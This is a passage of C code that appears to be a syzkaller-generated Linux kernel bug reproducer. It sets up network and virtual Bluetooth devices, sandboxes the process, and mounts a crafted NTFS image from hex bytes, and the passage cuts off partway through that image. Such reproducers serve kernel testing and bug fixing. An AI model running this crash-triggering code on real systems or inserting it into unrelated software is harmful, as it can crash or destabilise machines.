  netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2);
  netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v4,
               sizeof(second_half_v4));
  netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
  netlink_done(&nlmsg);
  netlink_nest(&nlmsg, NLA_F_NESTED | 0);
  netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2);
  netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v6,
               sizeof(second_half_v6));
  netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
  netlink_done(&nlmsg);
  netlink_done(&nlmsg);
  netlink_done(&nlmsg);
  netlink_done(&nlmsg);
  err = netlink_send(&nlmsg, sock);
  if (err < 0) {
  }
  netlink_init(&nlmsg, id, 0, &genlhdr, sizeof(genlhdr));
  netlink_attr(&nlmsg, WGDEVICE_A_IFNAME, ifname_c, strlen(ifname_c) + 1);
  netlink_attr(&nlmsg, WGDEVICE_A_PRIVATE_KEY, private_c, 32);
  netlink_attr(&nlmsg, WGDEVICE_A_LISTEN_PORT, &listen_c, 2);
  netlink_nest(&nlmsg, NLA_F_NESTED | WGDEVICE_A_PEERS);
  netlink_nest(&nlmsg, NLA_F_NESTED | 0);
  netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_a, 32);
  netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_a_v6,
               sizeof(endpoint_a_v6));
  netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL,
               &persistent_keepalives[4], 2);
  netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS);
  netlink_nest(&nlmsg, NLA_F_NESTED | 0);
  netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2);
  netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v4,
               sizeof(first_half_v4));
  netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
  netlink_done(&nlmsg);
  netlink_nest(&nlmsg, NLA_F_NESTED | 0);
  netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2);
  netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v6,
               sizeof(first_half_v6));
  netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
  netlink_done(&nlmsg);
  netlink_done(&nlmsg);
  netlink_done(&nlmsg);
  netlink_nest(&nlmsg, NLA_F_NESTED | 0);
  netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_b, 32);
  netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_b_v4,
               sizeof(endpoint_b_v4));
  netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL,
               &persistent_keepalives[5], 2);
  netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS);
  netlink_nest(&nlmsg, NLA_F_NESTED | 0);
  netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2);
  netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v4,
               sizeof(second_half_v4));
  netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
  netlink_done(&nlmsg);
  netlink_nest(&nlmsg, NLA_F_NESTED | 0);
  netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2);
  netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v6,
               sizeof(second_half_v6));
  netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1);
  netlink_done(&nlmsg);
  netlink_done(&nlmsg);
  netlink_done(&nlmsg);
  netlink_done(&nlmsg);
  err = netlink_send(&nlmsg, sock);
  if (err < 0) {
  }

error:
  close(sock);
}
static void initialize_netdevices(void)
{
  char netdevsim[16];
  sprintf(netdevsim, "netdevsim%d", (int)procid);
  struct {
    const char* type;
    const char* dev;
  } devtypes[] = {
      {"ip6gretap", "ip6gretap0"}, {"bridge", "bridge0"},
      {"vcan", "vcan0"},           {"bond", "bond0"},
      {"team", "team0"},           {"dummy", "dummy0"},
      {"nlmon", "nlmon0"},         {"caif", "caif0"},
      {"batadv", "batadv0"},       {"vxcan", "vxcan1"},
      {"netdevsim", netdevsim},    {"veth", 0},
      {"xfrm", "xfrm0"},           {"wireguard", "wg0"},
      {"wireguard", "wg1"},        {"wireguard", "wg2"},
  };
  const char* devmasters[] = {"bridge", "bond", "team", "batadv"};
  struct {
    const char* name;
    int macsize;
    bool noipv6;
  } devices[] = {
      {"lo", ETH_ALEN},
      {"sit0", 0},
      {"bridge0", ETH_ALEN},
      {"vcan0", 0, true},
      {"tunl0", 0},
      {"gre0", 0},
      {"gretap0", ETH_ALEN},
      {"ip_vti0", 0},
      {"ip6_vti0", 0},
      {"ip6tnl0", 0},
      {"ip6gre0", 0},
      {"ip6gretap0", ETH_ALEN},
      {"erspan0", ETH_ALEN},
      {"bond0", ETH_ALEN},
      {"veth0", ETH_ALEN},
      {"veth1", ETH_ALEN},
      {"team0", ETH_ALEN},
      {"veth0_to_bridge", ETH_ALEN},
      {"veth1_to_bridge", ETH_ALEN},
      {"veth0_to_bond", ETH_ALEN},
      {"veth1_to_bond", ETH_ALEN},
      {"veth0_to_team", ETH_ALEN},
      {"veth1_to_team", ETH_ALEN},
      {"veth0_to_hsr", ETH_ALEN},
      {"veth1_to_hsr", ETH_ALEN},
      {"hsr0", 0},
      {"dummy0", ETH_ALEN},
      {"nlmon0", 0},
      {"vxcan0", 0, true},
      {"vxcan1", 0, true},
      {"caif0", ETH_ALEN},
      {"batadv0", ETH_ALEN},
      {netdevsim, ETH_ALEN},
      {"xfrm0", ETH_ALEN},
      {"veth0_virt_wifi", ETH_ALEN},
      {"veth1_virt_wifi", ETH_ALEN},
      {"virt_wifi0", ETH_ALEN},
      {"veth0_vlan", ETH_ALEN},
      {"veth1_vlan", ETH_ALEN},
      {"vlan0", ETH_ALEN},
      {"vlan1", ETH_ALEN},
      {"macvlan0", ETH_ALEN},
      {"macvlan1", ETH_ALEN},
      {"ipvlan0", ETH_ALEN},
      {"ipvlan1", ETH_ALEN},
      {"veth0_macvtap", ETH_ALEN},
      {"veth1_macvtap", ETH_ALEN},
      {"macvtap0", ETH_ALEN},
      {"macsec0", ETH_ALEN},
      {"veth0_to_batadv", ETH_ALEN},
      {"veth1_to_batadv", ETH_ALEN},
      {"batadv_slave_0", ETH_ALEN},
      {"batadv_slave_1", ETH_ALEN},
      {"geneve0", ETH_ALEN},
      {"geneve1", ETH_ALEN},
      {"wg0", 0},
      {"wg1", 0},
      {"wg2", 0},
  };
  int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
  if (sock == -1)
    exit(1);
  unsigned i;
  for (i = 0; i < sizeof(devtypes) / sizeof(devtypes[0]); i++)
    netlink_add_device(&nlmsg, sock, devtypes[i].type, devtypes[i].dev);
  for (i = 0; i < sizeof(devmasters) / (sizeof(devmasters[0])); i++) {
    char master[32], slave0[32], veth0[32], slave1[32], veth1[32];
    sprintf(slave0, "%s_slave_0", devmasters[i]);
    sprintf(veth0, "veth0_to_%s", devmasters[i]);
    netlink_add_veth(&nlmsg, sock, slave0, veth0);
    sprintf(slave1, "%s_slave_1", devmasters[i]);
    sprintf(veth1, "veth1_to_%s", devmasters[i]);
    netlink_add_veth(&nlmsg, sock, slave1, veth1);
    sprintf(master, "%s0", devmasters[i]);
    netlink_device_change(&nlmsg, sock, slave0, false, master, 0, 0, NULL);
    netlink_device_change(&nlmsg, sock, slave1, false, master, 0, 0, NULL);
  }
  netlink_device_change(&nlmsg, sock, "bridge_slave_0", true, 0, 0, 0, NULL);
  netlink_device_change(&nlmsg, sock, "bridge_slave_1", true, 0, 0, 0, NULL);
  netlink_add_veth(&nlmsg, sock, "hsr_slave_0", "veth0_to_hsr");
  netlink_add_veth(&nlmsg, sock, "hsr_slave_1", "veth1_to_hsr");
  netlink_add_hsr(&nlmsg, sock, "hsr0", "hsr_slave_0", "hsr_slave_1");
  netlink_device_change(&nlmsg, sock, "hsr_slave_0", true, 0, 0, 0, NULL);
  netlink_device_change(&nlmsg, sock, "hsr_slave_1", true, 0, 0, 0, NULL);
  netlink_add_veth(&nlmsg, sock, "veth0_virt_wifi", "veth1_virt_wifi");
  netlink_add_linked(&nlmsg, sock, "virt_wifi", "virt_wifi0",
                     "veth1_virt_wifi");
  netlink_add_veth(&nlmsg, sock, "veth0_vlan", "veth1_vlan");
  netlink_add_vlan(&nlmsg, sock, "vlan0", "veth0_vlan", 0, htons(ETH_P_8021Q));
  netlink_add_vlan(&nlmsg, sock, "vlan1", "veth0_vlan", 1, htons(ETH_P_8021AD));
  netlink_add_macvlan(&nlmsg, sock, "macvlan0", "veth1_vlan");
  netlink_add_macvlan(&nlmsg, sock, "macvlan1", "veth1_vlan");
  netlink_add_ipvlan(&nlmsg, sock, "ipvlan0", "veth0_vlan", IPVLAN_MODE_L2, 0);
  netlink_add_ipvlan(&nlmsg, sock, "ipvlan1", "veth0_vlan", IPVLAN_MODE_L3S,
                     IPVLAN_F_VEPA);
  netlink_add_veth(&nlmsg, sock, "veth0_macvtap", "veth1_macvtap");
  netlink_add_linked(&nlmsg, sock, "macvtap", "macvtap0", "veth0_macvtap");
  netlink_add_linked(&nlmsg, sock, "macsec", "macsec0", "veth1_macvtap");
  char addr[32];
  sprintf(addr, DEV_IPV4, 14 + 10);
  struct in_addr geneve_addr4;
  if (inet_pton(AF_INET, addr, &geneve_addr4) <= 0)
    exit(1);
  struct in6_addr geneve_addr6;
  if (inet_pton(AF_INET6, "fc00::01", &geneve_addr6) <= 0)
    exit(1);
  netlink_add_geneve(&nlmsg, sock, "geneve0", 0, &geneve_addr4, 0);
  netlink_add_geneve(&nlmsg, sock, "geneve1", 1, 0, &geneve_addr6);
  netdevsim_add((int)procid, 4);
  netlink_wireguard_setup();
  for (i = 0; i < sizeof(devices) / (sizeof(devices[0])); i++) {
    char addr[32];
    sprintf(addr, DEV_IPV4, i + 10);
    netlink_add_addr4(&nlmsg, sock, devices[i].name, addr);
    if (!devices[i].noipv6) {
      sprintf(addr, DEV_IPV6, i + 10);
      netlink_add_addr6(&nlmsg, sock, devices[i].name, addr);
    }
    uint64_t macaddr = DEV_MAC + ((i + 10ull) << 40);
    netlink_device_change(&nlmsg, sock, devices[i].name, true, 0, &macaddr,
                          devices[i].macsize, NULL);
  }
  close(sock);
}
static void initialize_netdevices_init(void)
{
  int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
  if (sock == -1)
    exit(1);
  struct {
    const char* type;
    int macsize;
    bool noipv6;
    bool noup;
  } devtypes[] = {
      {"nr", 7, true}, {"rose", 5, true, true},
  };
  unsigned i;
  for (i = 0; i < sizeof(devtypes) / sizeof(devtypes[0]); i++) {
    char dev[32], addr[32];
    sprintf(dev, "%s%d", devtypes[i].type, (int)procid);
    sprintf(addr, "172.30.%d.%d", i, (int)procid + 1);
    netlink_add_addr4(&nlmsg, sock, dev, addr);
    if (!devtypes[i].noipv6) {
      sprintf(addr, "fe88::%02x:%02x", i, (int)procid + 1);
      netlink_add_addr6(&nlmsg, sock, dev, addr);
    }
    int macsize = devtypes[i].macsize;
    uint64_t macaddr = 0xbbbbbb +
                       ((unsigned long long)i << (8 * (macsize - 2))) +
                       (procid << (8 * (macsize - 1)));
    netlink_device_change(&nlmsg, sock, dev, !devtypes[i].noup, 0, &macaddr,
                          macsize, NULL);
  }
  close(sock);
}

#define MAX_FDS 30

#define BTPROTO_HCI 1
#define ACL_LINK 1
#define SCAN_PAGE 2

typedef struct {
  uint8_t b[6];
} __attribute__((packed)) bdaddr_t;

#define HCI_COMMAND_PKT 1
#define HCI_EVENT_PKT 4
#define HCI_VENDOR_PKT 0xff

struct hci_command_hdr {
  uint16_t opcode;
  uint8_t plen;
} __attribute__((packed));

struct hci_event_hdr {
  uint8_t evt;
  uint8_t plen;
} __attribute__((packed));

#define HCI_EV_CONN_COMPLETE 0x03
struct hci_ev_conn_complete {
  uint8_t status;
  uint16_t handle;
  bdaddr_t bdaddr;
  uint8_t link_type;
  uint8_t encr_mode;
} __attribute__((packed));

#define HCI_EV_CONN_REQUEST 0x04
struct hci_ev_conn_request {
  bdaddr_t bdaddr;
  uint8_t dev_class[3];
  uint8_t link_type;
} __attribute__((packed));

#define HCI_EV_REMOTE_FEATURES 0x0b
struct hci_ev_remote_features {
  uint8_t status;
  uint16_t handle;
  uint8_t features[8];
} __attribute__((packed));

#define HCI_EV_CMD_COMPLETE 0x0e
struct hci_ev_cmd_complete {
  uint8_t ncmd;
  uint16_t opcode;
} __attribute__((packed));

#define HCI_OP_WRITE_SCAN_ENABLE 0x0c1a

#define HCI_OP_READ_BUFFER_SIZE 0x1005
struct hci_rp_read_buffer_size {
  uint8_t status;
  uint16_t acl_mtu;
  uint8_t sco_mtu;
  uint16_t acl_max_pkt;
  uint16_t sco_max_pkt;
} __attribute__((packed));

#define HCI_OP_READ_BD_ADDR 0x1009
struct hci_rp_read_bd_addr {
  uint8_t status;
  bdaddr_t bdaddr;
} __attribute__((packed));

#define HCI_EV_LE_META 0x3e
struct hci_ev_le_meta {
  uint8_t subevent;
} __attribute__((packed));

#define HCI_EV_LE_CONN_COMPLETE 0x01
struct hci_ev_le_conn_complete {
  uint8_t status;
  uint16_t handle;
  uint8_t role;
  uint8_t bdaddr_type;
  bdaddr_t bdaddr;
  uint16_t interval;
  uint16_t latency;
  uint16_t supervision_timeout;
  uint8_t clk_accurancy;
} __attribute__((packed));

struct hci_dev_req {
  uint16_t dev_id;
  uint32_t dev_opt;
};

struct vhci_vendor_pkt {
  uint8_t type;
  uint8_t opcode;
  uint16_t id;
};

#define HCIDEVUP _IOW('H', 201, int)
#define HCISETSCAN _IOW('H', 221, int)

static int vhci_fd = -1;

static void rfkill_unblock_all()
{
  int fd = open("/dev/rfkill", O_WRONLY);
  if (fd < 0)
    exit(1);
  struct rfkill_event event = {0};
  event.idx = 0;
  event.type = RFKILL_TYPE_ALL;
  event.op = RFKILL_OP_CHANGE_ALL;
  event.soft = 0;
  event.hard = 0;
  if (write(fd, &event, sizeof(event)) < 0)
    exit(1);
  close(fd);
}

static void hci_send_event_packet(int fd, uint8_t evt, void* data,
                                  size_t data_len)
{
  struct iovec iv[3];
  struct hci_event_hdr hdr;
  hdr.evt = evt;
  hdr.plen = data_len;
  uint8_t type = HCI_EVENT_PKT;
  iv[0].iov_base = &type;
  iv[0].iov_len = sizeof(type);
  iv[1].iov_base = &hdr;
  iv[1].iov_len = sizeof(hdr);
  iv[2].iov_base = data;
  iv[2].iov_len = data_len;
  if (writev(fd, iv, sizeof(iv) / sizeof(struct iovec)) < 0)
    exit(1);
}

static void hci_send_event_cmd_complete(int fd, uint16_t opcode, void* data,
                                        size_t data_len)
{
  struct iovec iv[4];
  struct hci_event_hdr hdr;
  hdr.evt = HCI_EV_CMD_COMPLETE;
  hdr.plen = sizeof(struct hci_ev_cmd_complete) + data_len;
  struct hci_ev_cmd_complete evt_hdr;
  evt_hdr.ncmd = 1;
  evt_hdr.opcode = opcode;
  uint8_t type = HCI_EVENT_PKT;
  iv[0].iov_base = &type;
  iv[0].iov_len = sizeof(type);
  iv[1].iov_base = &hdr;
  iv[1].iov_len = sizeof(hdr);
  iv[2].iov_base = &evt_hdr;
  iv[2].iov_len = sizeof(evt_hdr);
  iv[3].iov_base = data;
  iv[3].iov_len = data_len;
  if (writev(fd, iv, sizeof(iv) / sizeof(struct iovec)) < 0)
    exit(1);
}

static bool process_command_pkt(int fd, char* buf, ssize_t buf_size)
{
  struct hci_command_hdr* hdr = (struct hci_command_hdr*)buf;
  if (buf_size < (ssize_t)sizeof(struct hci_command_hdr) ||
      hdr->plen != buf_size - sizeof(struct hci_command_hdr)) {
    exit(1);
  }
  switch (hdr->opcode) {
  case HCI_OP_WRITE_SCAN_ENABLE: {
    uint8_t status = 0;
    hci_send_event_cmd_complete(fd, hdr->opcode, &status, sizeof(status));
    return true;
  }
  case HCI_OP_READ_BD_ADDR: {
    struct hci_rp_read_bd_addr rp = {0};
    rp.status = 0;
    memset(&rp.bdaddr, 0xaa, 6);
    hci_send_event_cmd_complete(fd, hdr->opcode, &rp, sizeof(rp));
    return false;
  }
  case HCI_OP_READ_BUFFER_SIZE: {
    struct hci_rp_read_buffer_size rp = {0};
    rp.status = 0;
    rp.acl_mtu = 1021;
    rp.sco_mtu = 96;
    rp.acl_max_pkt = 4;
    rp.sco_max_pkt = 6;
    hci_send_event_cmd_complete(fd, hdr->opcode, &rp, sizeof(rp));
    return false;
  }
  }
  char dummy[0xf9] = {0};
  hci_send_event_cmd_complete(fd, hdr->opcode, dummy, sizeof(dummy));
  return false;
}

static void* event_thread(void* arg)
{
  while (1) {
    char buf[1024] = {0};
    ssize_t buf_size = read(vhci_fd, buf, sizeof(buf));
    if (buf_size < 0)
      exit(1);
    if (buf_size > 0 && buf[0] == HCI_COMMAND_PKT) {
      if (process_command_pkt(vhci_fd, buf + 1, buf_size - 1))
        break;
    }
  }
  return NULL;
}
#define HCI_HANDLE_1 200
#define HCI_HANDLE_2 201

static void initialize_vhci()
{
  int hci_sock = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI);
  if (hci_sock < 0)
    exit(1);
  vhci_fd = open("/dev/vhci", O_RDWR);
  if (vhci_fd == -1)
    exit(1);
  const int kVhciFd = 241;
  if (dup2(vhci_fd, kVhciFd) < 0)
    exit(1);
  close(vhci_fd);
  vhci_fd = kVhciFd;
  struct vhci_vendor_pkt vendor_pkt;
  if (read(vhci_fd, &vendor_pkt, sizeof(vendor_pkt)) != sizeof(vendor_pkt))
    exit(1);
  if (vendor_pkt.type != HCI_VENDOR_PKT)
    exit(1);
  pthread_t th;
  if (pthread_create(&th, NULL, event_thread, NULL))
    exit(1);
  int ret = ioctl(hci_sock, HCIDEVUP, vendor_pkt.id);
  if (ret) {
    if (errno == ERFKILL) {
      rfkill_unblock_all();
      ret = ioctl(hci_sock, HCIDEVUP, vendor_pkt.id);
    }
    if (ret && errno != EALREADY)
      exit(1);
  }
  struct hci_dev_req dr = {0};
  dr.dev_id = vendor_pkt.id;
  dr.dev_opt = SCAN_PAGE;
  if (ioctl(hci_sock, HCISETSCAN, &dr))
    exit(1);
  struct hci_ev_conn_request request;
  memset(&request, 0, sizeof(request));
  memset(&request.bdaddr, 0xaa, 6);
  *(uint8_t*)&request.bdaddr.b[5] = 0x10;
  request.link_type = ACL_LINK;
  hci_send_event_packet(vhci_fd, HCI_EV_CONN_REQUEST, &request,
                        sizeof(request));
  struct hci_ev_conn_complete complete;
  memset(&complete, 0, sizeof(complete));
  complete.status = 0;
  complete.handle = HCI_HANDLE_1;
  memset(&complete.bdaddr, 0xaa, 6);
  *(uint8_t*)&complete.bdaddr.b[5] = 0x10;
  complete.link_type = ACL_LINK;
  complete.encr_mode = 0;
  hci_send_event_packet(vhci_fd, HCI_EV_CONN_COMPLETE, &complete,
                        sizeof(complete));
  struct hci_ev_remote_features features;
  memset(&features, 0, sizeof(features));
  features.status = 0;
  features.handle = HCI_HANDLE_1;
  hci_send_event_packet(vhci_fd, HCI_EV_REMOTE_FEATURES, &features,
                        sizeof(features));
  struct {
    struct hci_ev_le_meta le_meta;
    struct hci_ev_le_conn_complete le_conn;
  } le_conn;
  memset(&le_conn, 0, sizeof(le_conn));
  le_conn.le_meta.subevent = HCI_EV_LE_CONN_COMPLETE;
  memset(&le_conn.le_conn.bdaddr, 0xaa, 6);
  *(uint8_t*)&le_conn.le_conn.bdaddr.b[5] = 0x11;
  le_conn.le_conn.role = 1;
  le_conn.le_conn.handle = HCI_HANDLE_2;
  hci_send_event_packet(vhci_fd, HCI_EV_LE_META, &le_conn, sizeof(le_conn));
  pthread_join(th, NULL);
  close(hci_sock);
}

struct fs_image_segment {
  void* data;
  uintptr_t size;
  uintptr_t offset;
};

#define IMAGE_MAX_SEGMENTS 4096
#define IMAGE_MAX_SIZE (129 << 20)

#define sys_memfd_create 319

static unsigned long fs_image_segment_check(unsigned long size,
                                            unsigned long nsegs,
                                            struct fs_image_segment* segs)
{
  if (nsegs > IMAGE_MAX_SEGMENTS)
    nsegs = IMAGE_MAX_SEGMENTS;
  for (size_t i = 0; i < nsegs; i++) {
    if (segs[i].size > IMAGE_MAX_SIZE)
      segs[i].size = IMAGE_MAX_SIZE;
    segs[i].offset %= IMAGE_MAX_SIZE;
    if (segs[i].offset > IMAGE_MAX_SIZE - segs[i].size)
      segs[i].offset = IMAGE_MAX_SIZE - segs[i].size;
    if (size < segs[i].offset + segs[i].offset)
      size = segs[i].offset + segs[i].offset;
  }
  if (size > IMAGE_MAX_SIZE)
    size = IMAGE_MAX_SIZE;
  return size;
}
static int setup_loop_device(long unsigned size, long unsigned nsegs,
                             struct fs_image_segment* segs,
                             const char* loopname, int* memfd_p, int* loopfd_p)
{
  int err = 0, loopfd = -1;
  size = fs_image_segment_check(size, nsegs, segs);
  int memfd = syscall(sys_memfd_create, "syzkaller", 0);
  if (memfd == -1) {
    err = errno;
    goto error;
  }
  if (ftruncate(memfd, size)) {
    err = errno;
    goto error_close_memfd;
  }
  for (size_t i = 0; i < nsegs; i++) {
    if (pwrite(memfd, segs[i].data, segs[i].size, segs[i].offset) < 0) {
    }
  }
  loopfd = open(loopname, O_RDWR);
  if (loopfd == -1) {
    err = errno;
    goto error_close_memfd;
  }
  if (ioctl(loopfd, LOOP_SET_FD, memfd)) {
    if (errno != EBUSY) {
      err = errno;
      goto error_close_loop;
    }
    ioctl(loopfd, LOOP_CLR_FD, 0);
    usleep(1000);
    if (ioctl(loopfd, LOOP_SET_FD, memfd)) {
      err = errno;
      goto error_close_loop;
    }
  }
  *memfd_p = memfd;
  *loopfd_p = loopfd;
  return 0;

error_close_loop:
  close(loopfd);
error_close_memfd:
  close(memfd);
error:
  errno = err;
  return -1;
}

static long syz_mount_image(volatile long fsarg, volatile long dir,
                            volatile unsigned long size,
                            volatile unsigned long nsegs,
                            volatile long segments, volatile long flags,
                            volatile long optsarg)
{
  struct fs_image_segment* segs = (struct fs_image_segment*)segments;
  int res = -1, err = 0, loopfd = -1, memfd = -1, need_loop_device = !!segs;
  char* mount_opts = (char*)optsarg;
  char* target = (char*)dir;
  char* fs = (char*)fsarg;
  char* source = NULL;
  char loopname[64];
  if (need_loop_device) {
    memset(loopname, 0, sizeof(loopname));
    snprintf(loopname, sizeof(loopname), "/dev/loop%llu", procid);
    if (setup_loop_device(size, nsegs, segs, loopname, &memfd, &loopfd) == -1)
      return -1;
    source = loopname;
  }
  mkdir(target, 0777);
  char opts[256];
  memset(opts, 0, sizeof(opts));
  if (strlen(mount_opts) > (sizeof(opts) - 32)) {
  }
  strncpy(opts, mount_opts, sizeof(opts) - 32);
  if (strcmp(fs, "iso9660") == 0) {
    flags |= MS_RDONLY;
  } else if (strncmp(fs, "ext", 3) == 0) {
    if (strstr(opts, "errors=panic") || strstr(opts, "errors=remount-ro") == 0)
      strcat(opts, ",errors=continue");
  } else if (strcmp(fs, "xfs") == 0) {
    strcat(opts, ",nouuid");
  }
  res = mount(source, target, fs, flags, opts);
  if (res == -1) {
    err = errno;
    goto error_clear_loop;
  }
  res = open(target, O_RDONLY | O_DIRECTORY);
  if (res == -1) {
    err = errno;
  }

error_clear_loop:
  if (need_loop_device) {
    ioctl(loopfd, LOOP_CLR_FD, 0);
    close(loopfd);
    close(memfd);
  }
  errno = err;
  return res;
}

static void setup_common()
{
  if (mount(0, "/sys/fs/fuse/connections", "fusectl", 0, 0)) {
  }
}

static void loop();

static void sandbox_common()
{
  prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
  setpgrp();
  setsid();
  struct rlimit rlim;
  rlim.rlim_cur = rlim.rlim_max = (200 << 20);
  setrlimit(RLIMIT_AS, &rlim);
  rlim.rlim_cur = rlim.rlim_max = 32 << 20;
  setrlimit(RLIMIT_MEMLOCK, &rlim);
  rlim.rlim_cur = rlim.rlim_max = 136 << 20;
  setrlimit(RLIMIT_FSIZE, &rlim);
  rlim.rlim_cur = rlim.rlim_max = 1 << 20;
  setrlimit(RLIMIT_STACK, &rlim);
  rlim.rlim_cur = rlim.rlim_max = 0;
  setrlimit(RLIMIT_CORE, &rlim);
  rlim.rlim_cur = rlim.rlim_max = 256;
  setrlimit(RLIMIT_NOFILE, &rlim);
  if (unshare(CLONE_NEWNS)) {
  }
  if (mount(NULL, "/", NULL, MS_REC | MS_PRIVATE, NULL)) {
  }
  if (unshare(CLONE_NEWIPC)) {
  }
  if (unshare(0x02000000)) {
  }
  if (unshare(CLONE_NEWUTS)) {
  }
  if (unshare(CLONE_SYSVSEM)) {
  }
  typedef struct {
    const char* name;
    const char* value;
  } sysctl_t;
  static const sysctl_t sysctls[] = {
      {"/proc/sys/kernel/shmmax", "16777216"},
      {"/proc/sys/kernel/shmall", "536870912"},
      {"/proc/sys/kernel/shmmni", "1024"},
      {"/proc/sys/kernel/msgmax", "8192"},
      {"/proc/sys/kernel/msgmni", "1024"},
      {"/proc/sys/kernel/msgmnb", "1024"},
      {"/proc/sys/kernel/sem", "1024 1048576 500 1024"},
  };
  unsigned i;
  for (i = 0; i < sizeof(sysctls) / sizeof(sysctls[0]); i++)
    write_file(sysctls[i].name, sysctls[i].value);
}

static int wait_for_loop(int pid)
{
  if (pid < 0)
    exit(1);
  int status = 0;
  while (waitpid(-1, &status, __WALL) != pid) {
  }
  return WEXITSTATUS(status);
}

static void drop_caps(void)
{
  struct __user_cap_header_struct cap_hdr = {};
  struct __user_cap_data_struct cap_data[2] = {};
  cap_hdr.version = _LINUX_CAPABILITY_VERSION_3;
  cap_hdr.pid = getpid();
  if (syscall(SYS_capget, &cap_hdr, &cap_data))
    exit(1);
  const int drop = (1 << CAP_SYS_PTRACE) | (1 << CAP_SYS_NICE);
  cap_data[0].effective &= ~drop;
  cap_data[0].permitted &= ~drop;
  cap_data[0].inheritable &= ~drop;
  if (syscall(SYS_capset, &cap_hdr, &cap_data))
    exit(1);
}

static int do_sandbox_none(void)
{
  if (unshare(CLONE_NEWPID)) {
  }
  int pid = fork();
  if (pid != 0)
    return wait_for_loop(pid);
  setup_common();
  initialize_vhci();
  sandbox_common();
  drop_caps();
  initialize_netdevices_init();
  if (unshare(CLONE_NEWNET)) {
  }
  initialize_tun();
  initialize_netdevices();
  loop();
  exit(1);
}

static void close_fds()
{
  for (int fd = 3; fd < MAX_FDS; fd++)
    close(fd);
}

static void setup_binfmt_misc()
{
  if (mount(0, "/proc/sys/fs/binfmt_misc", "binfmt_misc", 0, 0)) {
  }
  write_file("/proc/sys/fs/binfmt_misc/register", ":syz0:M:0:\x01::./file0:");
  write_file("/proc/sys/fs/binfmt_misc/register",
             ":syz1:M:1:\x02::./file0:POC");
}

void loop(void)
{
  NONFAILING(memcpy((void*)0x20000000, "ntfs\000", 5));
  NONFAILING(memcpy((void*)0x20000100, "./file0\000", 8));
  NONFAILING(*(uint64_t*)0x20000200 = 0x20010000);
  NONFAILING(memcpy(
      (void*)0x20010000,
      "\xeb\x52\x90\x4e\x54\x46\x53\x20\x20\x20\x20\x00\x04\x04\x00\x00\x00\x00"
      "\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x80\x00\x80\x00\xff\x07\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00"
      "\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\xf6\x00\x00\x00\x01\x00\x00\x00"
      "\xa3\xb8\xb2\x0f\xcf\x7a\xa8\x36\x00\x00\x00\x00\x0e\x1f\xbe\x71\x7c\xac"
      "\x22\xc0\x74\x0b\x56\xb4\x0e\xbb\x07\x00\xcd\x10\x5e\xeb\xf0\x32\xe4\xcd"
      "\x16\xcd\x19\xeb\xfe\x54\x68\x69\x73\x20\x69\x73\x20\x6e\x6f\x74\x20\x61"
      "\x20\x62\x6f\x6f\x74\x61\x62\x6c\x65\x20\x64\x69\x73\x6b\x2e\x20\x50\x6c"
      "\x65\x61\x73\x65\x20\x69\x6e\x73\x65\x72\x74\x20\x61\x20\x62\x6f\x6f\x74"
      "\x61\x62\x6c\x65\x20\x66\x6c\x6f\x70\x70\x79\x20\x61\x6e\x64\x0d\x0a\x70"
      "\x72\x65\x73\x73\x20\x61\x6e\x79\x20\x6b\x65\x79\x20\x74\x6f\x20\x74\x72"
      "\x79\x20\x61\x67\x61\x69\x6e\x20\x2e\x2e\x2e\x20\x0d\x0a\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x00\x00\x00",
      224));
  NONFAILING(*(uint64_t*)0x20000208 = 0xe0);
  NONFAILING(*(uint64_t*)0x20000210 = 0);
  NONFAILING(*(uint64_t*)0x20000218 = 0);
  NONFAILING(*(uint64_t*)0x20000220 = 0);
  NONFAILING(*(uint64_t*)0x20000228 = 0x1e0);
  NONFAILING(*(uint64_t*)0x20000230 = 0);
  NONFAILING(*(uint64_t*)0x20000238 = 0);
  NONFAILING(*(uint64_t*)0x20000240 = 0x2000);
  NONFAILING(*(uint64_t*)0x20000248 = 0x20010300);
  NONFAILING(memcpy(
      (void*)0x20010300,
      "\x46\x49\x4c\x45\x30\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
      "\x01\x00\x38\x00\x01\x00\x98\x01\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00"
